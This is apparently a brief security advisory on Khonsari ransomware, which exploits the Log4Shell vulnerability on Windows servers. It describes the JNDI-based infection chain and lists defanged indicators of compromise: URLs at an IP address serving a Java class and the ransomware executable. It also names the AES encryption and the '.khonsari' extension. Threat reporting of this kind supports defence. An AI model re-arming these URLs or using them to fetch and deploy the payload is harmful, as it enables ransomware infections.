Khonsari Ransomware Deployed by the Log4Shell Vulnerability;
A new ransomware family named Khonsari which targets Windows servers has been recently discovered utilizing Log4shell vulnerability to deploy itself.
The exploit loads the Java bytecode at hxxp://3.145.115[.]94/Main.class via JNDI, which then downloads the Kohnsari ransomware from hxxp://3.145.115[.]94/zambo/groenhuyzen.exe.
The ransomware encrypts files using the AES 128 CBC algorithm and the extension .khonsari will be added.
REFERENCES:
https://secure-web.cisco.com/1eEc9IOwNf_WdB6Pc9xVQmgQYg9zBJ7rQ7jBoEbcVNyaD4eolRfr-iG4ol0ukppYQSMw-axVkXDjwYDeikfFPNo7B_4-jZXifJGfPPpOoSetb6jwV6Xu-qm8CNDZ6eEIp6epAOsfcayqa0uCIzzHqkc-XtGcC77A_hDZ0532y_LcA872nsqW4l5GfIDIUGFKqXFOWnM22JFZn-R1LnR9SGeRIt93y_E7D4HIa2daZtPI/https%3A%2F%2Fwww.cadosecurity.com%2Fanalysis-of-novel-khonsari-ransomware-deployed-by-the-log4shell-vulnerability%2F